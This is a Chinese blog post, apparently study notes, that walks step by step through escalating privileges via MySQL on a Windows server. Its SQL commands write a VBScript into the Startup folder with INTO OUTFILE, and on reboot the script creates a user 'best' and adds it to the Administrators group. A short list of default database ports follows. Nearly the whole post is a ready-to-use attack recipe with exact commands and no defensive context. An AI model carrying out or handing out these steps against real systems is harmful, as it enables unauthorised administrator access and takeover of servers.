美文网首页
网络安全-Day50-Mysql启动项提权

网络安全-Day50-Mysql启动项提权

作者: K8s_Docker | 来源:发表于2020-05-11 19:11 被阅读0次

    Mysql启动项提权

    1、先删除一个数据库,保证在创建数据库时不会重复(drop database test1;)

    2、新增数据库test1(create database test1;)

    3、进入test1数据库(use test1;)

    4、创建一个表,表名“a”,表内有个CMD字段(create table a (cmd text);)

    5、在表a中插入数据,创建了一个对象(insert into a values ("set wshshell=createobject (""wscript.shell"")");)

    6、给步骤5的对象,添加一个创建best账户的值(insert into a values ("a=wshshell.run (""cmd.exe /c net user best best /add"",0)");)

    7、把best账户加入管理员组(insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best /add"",0)");)

    注意:注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!

    8、查询test1数据库中的a表(select * from a;)

    9、把数据库中那三条数据组成得vbs文件,best.vbs文件导入到启动项中(select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//best.vbs";)

    10、服务器的启动项中已经有best.vbs文件了

    11、重启服务器,并生成best账户(best账户在andministrator组中)

    mysql、mssql、orcal默认端口号

    1、sqlserver:默认端口号为:1433

    2、mysql:默认端口号为:3306

    3、oracle:默认端口号为:1521

    相关文章

      网友评论

          本文标题:网络安全-Day50-Mysql启动项提权

          本文链接:https://www.haomeiwen.com/subject/axtlnhtx.html